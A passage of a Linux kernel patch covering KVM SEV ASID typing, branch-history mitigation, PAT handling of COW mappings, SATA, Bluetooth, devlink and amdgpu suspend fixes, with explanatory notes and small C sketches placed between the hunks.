++		pr_info("SEV-ES %s (ASIDs %u - %u)\n",
++			sev_es_supported ? "enabled" : "disabled",
++			min_sev_asid > 1 ? 1 : 0, min_sev_asid - 1);
++
+ 	sev_enabled = sev_supported;
+ 	sev_es_enabled = sev_es_supported;
+ #endif
+@@ -2287,7 +2301,7 @@ int sev_cpu_init(struct svm_cpu_data *sd)
+  */
+ static void sev_flush_encrypted_page(struct kvm_vcpu *vcpu, void *va)
+ {
+-	int asid = to_kvm_svm(vcpu->kvm)->sev_info.asid;
++	unsigned int asid = sev_get_asid(vcpu->kvm);
+ 
+ 	/*
+ 	 * Note!  The address must be a kernel address, as regular page walk
+@@ -2608,7 +2622,7 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm)
+ void pre_sev_run(struct vcpu_svm *svm, int cpu)
+ {
+ 	struct svm_cpu_data *sd = per_cpu_ptr(&svm_data, cpu);
+-	int asid = sev_get_asid(svm->vcpu.kvm);
++	unsigned int asid = sev_get_asid(svm->vcpu.kvm);
+ 
+ 	/* Assign the asid allocated with this SEV guest */
+ 	svm->asid = asid;
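
The ASID partitioning that sev_asid_new() now documents can be sketched in
a few lines: plain SEV guests get [min_sev_asid, max_sev_asid], SEV-ES
guests get [1, min_sev_asid - 1], and firmware may report min > max, which
disables the plain-SEV side entirely. A standalone sketch with hypothetical
firmware values:

#include <stdio.h>

static void show_split(unsigned int min_sev_asid, unsigned int max_sev_asid)
{
	unsigned int es_min = 1;
	unsigned int es_max = min_sev_asid - 1;

	if (min_sev_asid > max_sev_asid)
		printf("SEV unusable (ASIDs %u - %u)\n",
		       min_sev_asid, max_sev_asid);
	else
		printf("SEV enabled (ASIDs %u - %u)\n",
		       min_sev_asid, max_sev_asid);
	printf("SEV-ES range: ASIDs %u - %u\n", es_min, es_max);
}

int main(void)
{
	show_split(100, 509);	/* hypothetical firmware-reported values */
	return 0;
}
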
+diff --git a/arch/x86/kvm/trace.h b/arch/x86/kvm/trace.h
+index bc25589ad5886..6c1dcf44c4fa3 100644
+--- a/arch/x86/kvm/trace.h
++++ b/arch/x86/kvm/trace.h
+@@ -729,13 +729,13 @@ TRACE_EVENT(kvm_nested_intr_vmexit,
+  * Tracepoint for nested #vmexit because of interrupt pending
+  */
+ TRACE_EVENT(kvm_invlpga,
+-	    TP_PROTO(__u64 rip, int asid, u64 address),
++	    TP_PROTO(__u64 rip, unsigned int asid, u64 address),
+ 	    TP_ARGS(rip, asid, address),
+ 
+ 	TP_STRUCT__entry(
+-		__field(	__u64,	rip	)
+-		__field(	int,	asid	)
+-		__field(	__u64,	address	)
++		__field(	__u64,		rip	)
++		__field(	unsigned int,	asid	)
++		__field(	__u64,		address	)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -744,7 +744,7 @@ TRACE_EVENT(kvm_invlpga,
+ 		__entry->address	=	address;
+ 	),
+ 
+-	TP_printk("rip: 0x%016llx asid: %d address: 0x%016llx",
++	TP_printk("rip: 0x%016llx asid: %u address: 0x%016llx",
+ 		  __entry->rip, __entry->asid, __entry->address)
+ );
+ 
+diff --git a/arch/x86/kvm/vmx/vmenter.S b/arch/x86/kvm/vmx/vmenter.S
+index 0b2cad66dee12..b4f8937226c21 100644
+--- a/arch/x86/kvm/vmx/vmenter.S
++++ b/arch/x86/kvm/vmx/vmenter.S
+@@ -242,6 +242,8 @@ SYM_INNER_LABEL(vmx_vmexit, SYM_L_GLOBAL)
+ 
+ 	call vmx_spec_ctrl_restore_host
+ 
++	CLEAR_BRANCH_HISTORY_VMEXIT
++
+ 	/* Put return value in AX */
+ 	mov %_ASM_BX, %_ASM_AX
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 0e6e63a8f0949..f724765032bc4 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -1614,7 +1614,7 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+ 	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO | \
+-	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR)
++	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR | ARCH_CAP_BHI_NO)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 65c5c44f006bc..055955c9bfcb7 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -110,6 +110,7 @@ SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ret
+ 	int3
+ SYM_FUNC_END(srso_alias_untrain_ret)
++__EXPORT_THUNK(srso_alias_untrain_ret)
+ #endif
+ 
+ SYM_START(srso_alias_safe_ret, SYM_L_GLOBAL, SYM_A_NONE)
+@@ -252,9 +253,7 @@ SYM_CODE_START(srso_return_thunk)
+ SYM_CODE_END(srso_return_thunk)
+ 
+ SYM_FUNC_START(entry_untrain_ret)
+-	ALTERNATIVE_2 "jmp retbleed_untrain_ret", \
+-		      "jmp srso_untrain_ret", X86_FEATURE_SRSO, \
+-		      "jmp srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
++	ALTERNATIVE "jmp retbleed_untrain_ret", "jmp srso_untrain_ret", X86_FEATURE_SRSO
+ SYM_FUNC_END(entry_untrain_ret)
+ __EXPORT_THUNK(entry_untrain_ret)
+ 
+@@ -262,6 +261,7 @@ SYM_CODE_START(__x86_return_thunk)
+ 	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ANNOTATE_UNRET_SAFE
++	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+diff --git a/arch/x86/mm/ident_map.c b/arch/x86/mm/ident_map.c
+index f50cc210a9818..968d7005f4a72 100644
+--- a/arch/x86/mm/ident_map.c
++++ b/arch/x86/mm/ident_map.c
+@@ -26,31 +26,18 @@ static int ident_pud_init(struct x86_mapping_info *info, pud_t *pud_page,
+ 	for (; addr < end; addr = next) {
+ 		pud_t *pud = pud_page + pud_index(addr);
+ 		pmd_t *pmd;
+-		bool use_gbpage;
+ 
+ 		next = (addr & PUD_MASK) + PUD_SIZE;
+ 		if (next > end)
+ 			next = end;
+ 
+-		/* if this is already a gbpage, this portion is already mapped */
+-		if (pud_large(*pud))
+-			continue;
+-
+-		/* Is using a gbpage allowed? */
+-		use_gbpage = info->direct_gbpages;
+-
+-		/* Don't use gbpage if it maps more than the requested region. */
+-		/* at the begining: */
+-		use_gbpage &= ((addr & ~PUD_MASK) == 0);
+-		/* ... or at the end: */
+-		use_gbpage &= ((next & ~PUD_MASK) == 0);
+-
+-		/* Never overwrite existing mappings */
+-		use_gbpage &= !pud_present(*pud);
+-
+-		if (use_gbpage) {
++		if (info->direct_gbpages) {
+ 			pud_t pudval;
+ 
++			if (pud_present(*pud))
++				continue;
++
++			addr &= PUD_MASK;
+ 			pudval = __pud((addr - info->offset) | info->page_flag);
+ 			set_pud(pud, pudval);
+ 			continue;
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 66a209f7eb86d..d6fe9093ea919 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -997,6 +997,38 @@ static void free_pfn_range(u64 paddr, unsigned long size)
+ 		memtype_free(paddr, paddr + size);
+ }
+ 
++static int get_pat_info(struct vm_area_struct *vma, resource_size_t *paddr,
++		pgprot_t *pgprot)
++{
++	unsigned long prot;
++
++	VM_WARN_ON_ONCE(!(vma->vm_flags & VM_PAT));
++
++	/*
++	 * We need the starting PFN and cachemode used for track_pfn_remap()
++	 * that covered the whole VMA. For most mappings, we can obtain that
++	 * information from the page tables. For COW mappings, we might now
++	 * suddenly have anon folios mapped and follow_phys() will fail.
++	 *
++	 * Fall back to using vma->vm_pgoff, see remap_pfn_range_notrack(), to
++	 * detect the PFN. If we need the cachemode as well, we're out of luck
++	 * for now and have to fail fork().
++	 */
++	if (!follow_phys(vma, vma->vm_start, 0, &prot, paddr)) {
++		if (pgprot)
++			*pgprot = __pgprot(prot);
++		return 0;
++	}
++	if (is_cow_mapping(vma->vm_flags)) {
++		if (pgprot)
++			return -EINVAL;
++		*paddr = (resource_size_t)vma->vm_pgoff << PAGE_SHIFT;
++		return 0;
++	}
++	WARN_ON_ONCE(1);
++	return -EINVAL;
++}
++
+ /*
+  * track_pfn_copy is called when vma that is covering the pfnmap gets
+  * copied through copy_page_range().
+@@ -1007,20 +1039,13 @@ static void free_pfn_range(u64 paddr, unsigned long size)
+ int track_pfn_copy(struct vm_area_struct *vma)
+ {
+ 	resource_size_t paddr;
+-	unsigned long prot;
+ 	unsigned long vma_size = vma->vm_end - vma->vm_start;
+ 	pgprot_t pgprot;
+ 
+ 	if (vma->vm_flags & VM_PAT) {
+-		/*
+-		 * reserve the whole chunk covered by vma. We need the
+-		 * starting address and protection from pte.
+-		 */
+-		if (follow_phys(vma, vma->vm_start, 0, &prot, &paddr)) {
+-			WARN_ON_ONCE(1);
++		if (get_pat_info(vma, &paddr, &pgprot))
+ 			return -EINVAL;
+-		}
+-		pgprot = __pgprot(prot);
++		/* reserve the whole chunk covered by vma. */
+ 		return reserve_pfn_range(paddr, vma_size, &pgprot, 1);
+ 	}
+ 
+@@ -1095,7 +1120,6 @@ void untrack_pfn(struct vm_area_struct *vma, unsigned long pfn,
+ 		 unsigned long size)
+ {
+ 	resource_size_t paddr;
+-	unsigned long prot;
+ 
+ 	if (vma && !(vma->vm_flags & VM_PAT))
+ 		return;
+@@ -1103,11 +1127,8 @@ void untrack_pfn(struct vm_area_struct *vma, unsigned long pfn,
+ 	/* free the chunk starting from pfn or the whole chunk */
+ 	paddr = (resource_size_t)pfn << PAGE_SHIFT;
+ 	if (!paddr && !size) {
+-		if (follow_phys(vma, vma->vm_start, 0, &prot, &paddr)) {
+-			WARN_ON_ONCE(1);
++		if (get_pat_info(vma, &paddr, NULL))
+ 			return;
+-		}
+-
+ 		size = vma->vm_end - vma->vm_start;
+ 	}
+ 	free_pfn_range(paddr, size);
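
The fallback order in get_pat_info() above can be mirrored in a standalone
sketch. The toy_vma type, toy_get_pat_info() and the constants here are
invented; the real code uses follow_phys(), vm_pgoff and PAGE_SHIFT.

#include <stdbool.h>
#include <stdio.h>

struct toy_vma { bool cow; unsigned long vm_pgoff; };

/*
 * Mirror of the fallback above: prefer the page-table walk; for COW
 * mappings fall back to vm_pgoff, but only when the caller does not
 * also need the cachemode; otherwise fail (the kernel WARNs, and
 * fork() fails).
 */
static int toy_get_pat_info(const struct toy_vma *vma, bool pte_walk_ok,
			    unsigned long long *paddr, bool want_pgprot)
{
	if (pte_walk_ok) {		/* follow_phys() succeeded */
		*paddr = 0x1000;	/* made-up value from the PTE */
		return 0;
	}
	if (vma->cow) {
		if (want_pgprot)
			return -1;	/* cachemode unrecoverable */
		*paddr = (unsigned long long)vma->vm_pgoff << 12;
		return 0;
	}
	return -1;
}

int main(void)
{
	struct toy_vma vma = { .cow = true, .vm_pgoff = 0x100 };
	unsigned long long paddr;

	if (!toy_get_pat_info(&vma, false, &paddr, false))
		printf("paddr from vm_pgoff: 0x%llx\n", paddr);
	return 0;
}
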
+diff --git a/drivers/acpi/acpica/dbnames.c b/drivers/acpi/acpica/dbnames.c
+index b91155ea9c343..c9131259f717b 100644
+--- a/drivers/acpi/acpica/dbnames.c
++++ b/drivers/acpi/acpica/dbnames.c
+@@ -550,8 +550,12 @@ acpi_db_walk_for_fields(acpi_handle obj_handle,
+ 	ACPI_FREE(buffer.pointer);
+ 
+ 	buffer.length = ACPI_ALLOCATE_LOCAL_BUFFER;
+-	acpi_evaluate_object(obj_handle, NULL, NULL, &buffer);
+-
++	status = acpi_evaluate_object(obj_handle, NULL, NULL, &buffer);
++	if (ACPI_FAILURE(status)) {
++		acpi_os_printf("Could not evaluate object %p\n",
++			       obj_handle);
++		return (AE_OK);
++	}
+ 	/*
+ 	 * Since this is a field unit, surround the output in braces
+ 	 */
+diff --git a/drivers/ata/sata_mv.c b/drivers/ata/sata_mv.c
+index 17f9062b0eaa5..9cf540017a5e5 100644
+--- a/drivers/ata/sata_mv.c
++++ b/drivers/ata/sata_mv.c
+@@ -787,37 +787,6 @@ static const struct ata_port_info mv_port_info[] = {
+ 	},
+ };
+ 
+-static const struct pci_device_id mv_pci_tbl[] = {
+-	{ PCI_VDEVICE(MARVELL, 0x5040), chip_504x },
+-	{ PCI_VDEVICE(MARVELL, 0x5041), chip_504x },
+-	{ PCI_VDEVICE(MARVELL, 0x5080), chip_5080 },
+-	{ PCI_VDEVICE(MARVELL, 0x5081), chip_508x },
+-	/* RocketRAID 1720/174x have different identifiers */
+-	{ PCI_VDEVICE(TTI, 0x1720), chip_6042 },
+-	{ PCI_VDEVICE(TTI, 0x1740), chip_6042 },
+-	{ PCI_VDEVICE(TTI, 0x1742), chip_6042 },
+-
+-	{ PCI_VDEVICE(MARVELL, 0x6040), chip_604x },
+-	{ PCI_VDEVICE(MARVELL, 0x6041), chip_604x },
+-	{ PCI_VDEVICE(MARVELL, 0x6042), chip_6042 },
+-	{ PCI_VDEVICE(MARVELL, 0x6080), chip_608x },
+-	{ PCI_VDEVICE(MARVELL, 0x6081), chip_608x },
+-
+-	{ PCI_VDEVICE(ADAPTEC2, 0x0241), chip_604x },
+-
+-	/* Adaptec 1430SA */
+-	{ PCI_VDEVICE(ADAPTEC2, 0x0243), chip_7042 },
+-
+-	/* Marvell 7042 support */
+-	{ PCI_VDEVICE(MARVELL, 0x7042), chip_7042 },
+-
+-	/* Highpoint RocketRAID PCIe series */
+-	{ PCI_VDEVICE(TTI, 0x2300), chip_7042 },
+-	{ PCI_VDEVICE(TTI, 0x2310), chip_7042 },
+-
+-	{ }			/* terminate list */
+-};
+-
+ static const struct mv_hw_ops mv5xxx_ops = {
+ 	.phy_errata		= mv5_phy_errata,
+ 	.enable_leds		= mv5_enable_leds,
+@@ -4301,6 +4270,36 @@ static int mv_pci_init_one(struct pci_dev *pdev,
+ static int mv_pci_device_resume(struct pci_dev *pdev);
+ #endif
+ 
++static const struct pci_device_id mv_pci_tbl[] = {
++	{ PCI_VDEVICE(MARVELL, 0x5040), chip_504x },
++	{ PCI_VDEVICE(MARVELL, 0x5041), chip_504x },
++	{ PCI_VDEVICE(MARVELL, 0x5080), chip_5080 },
++	{ PCI_VDEVICE(MARVELL, 0x5081), chip_508x },
++	/* RocketRAID 1720/174x have different identifiers */
++	{ PCI_VDEVICE(TTI, 0x1720), chip_6042 },
++	{ PCI_VDEVICE(TTI, 0x1740), chip_6042 },
++	{ PCI_VDEVICE(TTI, 0x1742), chip_6042 },
++
++	{ PCI_VDEVICE(MARVELL, 0x6040), chip_604x },
++	{ PCI_VDEVICE(MARVELL, 0x6041), chip_604x },
++	{ PCI_VDEVICE(MARVELL, 0x6042), chip_6042 },
++	{ PCI_VDEVICE(MARVELL, 0x6080), chip_608x },
++	{ PCI_VDEVICE(MARVELL, 0x6081), chip_608x },
++
++	{ PCI_VDEVICE(ADAPTEC2, 0x0241), chip_604x },
++
++	/* Adaptec 1430SA */
++	{ PCI_VDEVICE(ADAPTEC2, 0x0243), chip_7042 },
++
++	/* Marvell 7042 support */
++	{ PCI_VDEVICE(MARVELL, 0x7042), chip_7042 },
++
++	/* Highpoint RocketRAID PCIe series */
++	{ PCI_VDEVICE(TTI, 0x2300), chip_7042 },
++	{ PCI_VDEVICE(TTI, 0x2310), chip_7042 },
++
++	{ }			/* terminate list */
++};
+ 
+ static struct pci_driver mv_pci_driver = {
+ 	.name			= DRV_NAME,
+@@ -4313,6 +4312,7 @@ static struct pci_driver mv_pci_driver = {
+ #endif
+ 
+ };
++MODULE_DEVICE_TABLE(pci, mv_pci_tbl);
+ 
+ /**
+  *      mv_print_info - Dump key info to kernel log for perusal.
+@@ -4485,7 +4485,6 @@ static void __exit mv_exit(void)
+ MODULE_AUTHOR("Brett Russ");
+ MODULE_DESCRIPTION("SCSI low-level driver for Marvell SATA controllers");
+ MODULE_LICENSE("GPL v2");
+-MODULE_DEVICE_TABLE(pci, mv_pci_tbl);
+ MODULE_VERSION(DRV_VERSION);
+ MODULE_ALIAS("platform:" DRV_NAME);
+ 
+diff --git a/drivers/ata/sata_sx4.c b/drivers/ata/sata_sx4.c
+index 6ceec59cb2913..fa1966638c060 100644
+--- a/drivers/ata/sata_sx4.c
++++ b/drivers/ata/sata_sx4.c
+@@ -958,8 +958,7 @@ static void pdc20621_get_from_dimm(struct ata_host *host, void *psource,
+ 
+ 	offset -= (idx * window_size);
+ 	idx++;
+-	dist = ((long) (window_size - (offset + size))) >= 0 ? size :
+-		(long) (window_size - offset);
++	dist = min(size, window_size - offset);
+ 	memcpy_fromio(psource, dimm_mmio + offset / 4, dist);
+ 
+ 	psource += dist;
+@@ -1006,8 +1005,7 @@ static void pdc20621_put_to_dimm(struct ata_host *host, void *psource,
+ 	readl(mmio + PDC_DIMM_WINDOW_CTLR);
+ 	offset -= (idx * window_size);
+ 	idx++;
+-	dist = ((long)(s32)(window_size - (offset + size))) >= 0 ? size :
+-		(long) (window_size - offset);
++	dist = min(size, window_size - offset);
+ 	memcpy_toio(dimm_mmio + offset / 4, psource, dist);
+ 	writel(0x01, mmio + PDC_GENERAL_CTLR);
+ 	readl(mmio + PDC_GENERAL_CTLR);
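
The min() rewrite above replaces a signedness-prone comparison with a
direct statement of intent: copy at most what is left in the current
window. A standalone sketch of the windowed-copy pattern (the real driver's
window-selection register writes and memcpy_fromio() are elided):

#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MIN(a, b) ((a) < (b) ? (a) : (b))

/* Copy size bytes that live behind a sliding window of window_size. */
static void windowed_copy(char *dst, const char *backing, size_t offset,
			  size_t size, size_t window_size)
{
	while (size) {
		size_t in_window = offset % window_size;
		size_t dist = MIN(size, window_size - in_window);

		/* real driver: program the window index, then copy */
		memcpy(dst, backing + offset, dist);
		dst += dist;
		offset += dist;
		size -= dist;
	}
}

int main(void)
{
	char src[64] = "windowed copy demo", dst[64];

	windowed_copy(dst, src, 0, sizeof(src), 16);
	puts(dst);
	return 0;
}
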
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 3078f44dc1861..8d87808cdb8aa 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -56,6 +56,7 @@ static bool fw_devlink_is_permissive(void);
+ static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
++static struct workqueue_struct *device_link_wq;
+ 
+ /**
+  * __fwnode_link_add - Create a link between two fwnode_handles.
+@@ -585,12 +586,26 @@ static void devlink_dev_release(struct device *dev)
+ 	/*
+ 	 * It may take a while to complete this work because of the SRCU
+ 	 * synchronization in device_link_release_fn() and if the consumer or
+-	 * supplier devices get deleted when it runs, so put it into the "long"
+-	 * workqueue.
++	 * supplier devices get deleted when it runs, so put it into the
++	 * dedicated workqueue.
+ 	 */
+-	queue_work(system_long_wq, &link->rm_work);
++	queue_work(device_link_wq, &link->rm_work);
+ }
+ 
++/**
++ * device_link_wait_removal - Wait for ongoing devlink removal jobs to terminate
++ */
++void device_link_wait_removal(void)
++{
++	/*
++	 * devlink removal jobs are queued in the dedicated work queue.
++	 * To be sure that all removal jobs are terminated, ensure that any
++	 * scheduled work has run to completion.
++	 */
++	flush_workqueue(device_link_wq);
++}
++EXPORT_SYMBOL_GPL(device_link_wait_removal);
++
+ static struct class devlink_class = {
+ 	.name = "devlink",
+ 	.owner = THIS_MODULE,
+@@ -4132,9 +4147,14 @@ int __init devices_init(void)
+ 	sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
+ 	if (!sysfs_dev_char_kobj)
+ 		goto char_kobj_err;
++	device_link_wq = alloc_workqueue("device_link_wq", 0, 0);
++	if (!device_link_wq)
++		goto wq_err;
+ 
+ 	return 0;
+ 
++ wq_err:
++	kobject_put(sysfs_dev_char_kobj);
+  char_kobj_err:
+ 	kobject_put(sysfs_dev_block_kobj);
+  block_kobj_err:
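
The pattern introduced above, a dedicated workqueue so that waiters can
flush exactly the devlink release work rather than all of system_long_wq,
looks roughly like this minimal kernel-style sketch (the demo_* names are
invented, and a module context is assumed):

#include <linux/errno.h>
#include <linux/workqueue.h>

static struct workqueue_struct *demo_wq;

static void demo_release(struct work_struct *w)
{
	/* slow teardown work would run here */
}
static DECLARE_WORK(demo_work, demo_release);

static int demo_init(void)
{
	/* one private queue instead of sharing a system workqueue */
	demo_wq = alloc_workqueue("demo_wq", 0, 0);
	if (!demo_wq)
		return -ENOMEM;
	queue_work(demo_wq, &demo_work);
	return 0;
}

/* Waiters target just this queue, like device_link_wait_removal() above */
static void demo_wait_removal(void)
{
	flush_workqueue(demo_wq);
}
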
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 0211f704a358b..5277090c6d6d7 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -758,11 +758,15 @@ EXPORT_SYMBOL_GPL(qca_uart_setup);
+ 
+ int qca_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ {
++	bdaddr_t bdaddr_swapped;
+ 	struct sk_buff *skb;
+ 	int err;
+ 
+-	skb = __hci_cmd_sync_ev(hdev, EDL_WRITE_BD_ADDR_OPCODE, 6, bdaddr,
+-				HCI_EV_VENDOR, HCI_INIT_TIMEOUT);
++	baswap(&bdaddr_swapped, bdaddr);
++
++	skb = __hci_cmd_sync_ev(hdev, EDL_WRITE_BD_ADDR_OPCODE, 6,
++				&bdaddr_swapped, HCI_EV_VENDOR,
++				HCI_INIT_TIMEOUT);
+ 	if (IS_ERR(skb)) {
+ 		err = PTR_ERR(skb);
+ 		bt_dev_err(hdev, "QCA Change address cmd failed (%d)", err);
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 2acda547f4f3e..33956ddec9337 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -7,7 +7,6 @@
+  *
+  *  Copyright (C) 2007 Texas Instruments, Inc.
+  *  Copyright (c) 2010, 2012, 2018 The Linux Foundation. All rights reserved.
+- *  Copyright (c) 2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  *  Acknowledgements:
+  *  This file is based on hci_ll.c, which was...
+@@ -226,6 +225,7 @@ struct qca_serdev {
+ 	struct qca_power *bt_power;
+ 	u32 init_speed;
+ 	u32 oper_speed;
++	bool bdaddr_property_broken;
+ 	const char *firmware_name;
+ };
+ 
+@@ -1788,6 +1788,7 @@ static int qca_setup(struct hci_uart *hu)
+ 	const char *firmware_name = qca_get_firmware_name(hu);
+ 	int ret;
+ 	struct qca_btsoc_version ver;
++	struct qca_serdev *qcadev;
+ 	const char *soc_name;
+ 
+ 	ret = qca_check_speeds(hu);
+@@ -1845,16 +1846,11 @@ static int qca_setup(struct hci_uart *hu)
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+ 	case QCA_WCN7850:
++		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+ 
+-		/* Set BDA quirk bit for reading BDA value from fwnode property
+-		 * only if that property exist in DT.
+-		 */
+-		if (fwnode_property_present(dev_fwnode(hdev->dev.parent), "local-bd-address")) {
+-			set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+-			bt_dev_info(hdev, "setting quirk bit to read BDA from fwnode later");
+-		} else {
+-			bt_dev_dbg(hdev, "local-bd-address` is not present in the devicetree so not setting quirk bit for BDA");
+-		}
++		qcadev = serdev_device_get_drvdata(hu->serdev);
++		if (qcadev->bdaddr_property_broken)
++			set_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks);
+ 
+ 		hci_set_aosp_capable(hdev);
+ 
+@@ -2223,6 +2219,9 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	if (!qcadev->oper_speed)
+ 		BT_DBG("UART will pick default operating speed");
+ 
++	qcadev->bdaddr_property_broken = device_property_read_bool(&serdev->dev,
++			"qcom,local-bd-address-broken");
++
+ 	if (data)
+ 		qcadev->btsoc_type = data->soc_type;
+ 	else
+diff --git a/drivers/dma-buf/st-dma-fence-chain.c b/drivers/dma-buf/st-dma-fence-chain.c
+index 0a9b099d05187..d90479d830fc3 100644
+--- a/drivers/dma-buf/st-dma-fence-chain.c
++++ b/drivers/dma-buf/st-dma-fence-chain.c
+@@ -84,11 +84,11 @@ static int sanitycheck(void *arg)
+ 		return -ENOMEM;
+ 
+ 	chain = mock_chain(NULL, f, 1);
+-	if (!chain)
++	if (chain)
++		dma_fence_enable_sw_signaling(chain);
++	else
+ 		err = -ENOMEM;
+ 
+-	dma_fence_enable_sw_signaling(chain);
+-
+ 	dma_fence_signal(f);
+ 	dma_fence_put(f);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index e636c7850f777..dd22d2559720c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1342,6 +1342,7 @@ void amdgpu_driver_postclose_kms(struct drm_device *dev,
+ void amdgpu_driver_release_kms(struct drm_device *dev);
+ 
+ int amdgpu_device_ip_suspend(struct amdgpu_device *adev);
++int amdgpu_device_prepare(struct drm_device *dev);
+ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon);
+ int amdgpu_device_resume(struct drm_device *dev, bool fbcon);
+ u32 amdgpu_get_vblank_counter_kms(struct drm_crtc *crtc);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 6a4749c0c5a58..b11690a816e73 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1639,6 +1639,7 @@ static void amdgpu_switcheroo_set_state(struct pci_dev *pdev,
+ 	} else {
+ 		pr_info("switched off\n");
+ 		dev->switch_power_state = DRM_SWITCH_POWER_CHANGING;
++		amdgpu_device_prepare(dev);
+ 		amdgpu_device_suspend(dev, true);
+ 		amdgpu_device_cache_pci_state(pdev);
+ 		/* Shut down the device */
+@@ -4167,6 +4168,43 @@ static int amdgpu_device_evict_resources(struct amdgpu_device *adev)
+ /*
+  * Suspend & resume.
+  */
++/**
++ * amdgpu_device_prepare - prepare for device suspend
++ *
++ * @dev: drm dev pointer
++ *
++ * Prepare to put the hw in the suspend state (all asics).
++ * Returns 0 for success or an error on failure.
++ * Called at driver suspend.
++ */
++int amdgpu_device_prepare(struct drm_device *dev)
++{
++	struct amdgpu_device *adev = drm_to_adev(dev);
++	int i, r;
++
++	if (dev->switch_power_state == DRM_SWITCH_POWER_OFF)
++		return 0;
++
++	/* Evict the majority of BOs before starting suspend sequence */
++	r = amdgpu_device_evict_resources(adev);
++	if (r)
++		return r;
++
++	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
++
++	for (i = 0; i < adev->num_ip_blocks; i++) {
++		if (!adev->ip_blocks[i].status.valid)
++			continue;
++		if (!adev->ip_blocks[i].version->funcs->prepare_suspend)
++			continue;
++		r = adev->ip_blocks[i].version->funcs->prepare_suspend((void *)adev);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ /**
+  * amdgpu_device_suspend - initiate device suspend
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index f24c3a20e901d..9a5416331f02e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2391,8 +2391,9 @@ static int amdgpu_pmops_prepare(struct device *dev)
+ 	/* Return a positive number here so
+ 	 * DPM_FLAG_SMART_SUSPEND works properly
+ 	 */
+-	if (amdgpu_device_supports_boco(drm_dev))
+-		return pm_runtime_suspended(dev);
++	if (amdgpu_device_supports_boco(drm_dev) &&
++	    pm_runtime_suspended(dev))
++		return 1;
+ 
+ 	/* if we will not support s3 or s2i for the device
+ 	 *  then skip suspend
+@@ -2401,7 +2402,7 @@ static int amdgpu_pmops_prepare(struct device *dev)
+ 	    !amdgpu_acpi_is_s3_active(adev))
+ 		return 1;
+ 
+-	return 0;
++	return amdgpu_device_prepare(drm_dev);
+ }
+ 
+ static void amdgpu_pmops_complete(struct device *dev)
+@@ -2600,6 +2601,9 @@ static int amdgpu_pmops_runtime_suspend(struct device *dev)
+ 	if (amdgpu_device_supports_boco(drm_dev))
+ 		adev->mp1_state = PP_MP1_STATE_UNLOAD;
+ 
++	ret = amdgpu_device_prepare(drm_dev);
++	if (ret)
++		return ret;
+ 	ret = amdgpu_device_suspend(drm_dev, false);
+ 	if (ret) {
+ 		adev->in_runpm = false;
+diff --git a/drivers/gpu/drm/amd/include/amd_shared.h b/drivers/gpu/drm/amd/include/amd_shared.h
+index f175e65b853a0..34467427c9f97 100644
+--- a/drivers/gpu/drm/amd/include/amd_shared.h
++++ b/drivers/gpu/drm/amd/include/amd_shared.h
+@@ -294,6 +294,7 @@ struct amd_ip_funcs {
+ 	int (*hw_init)(void *handle);
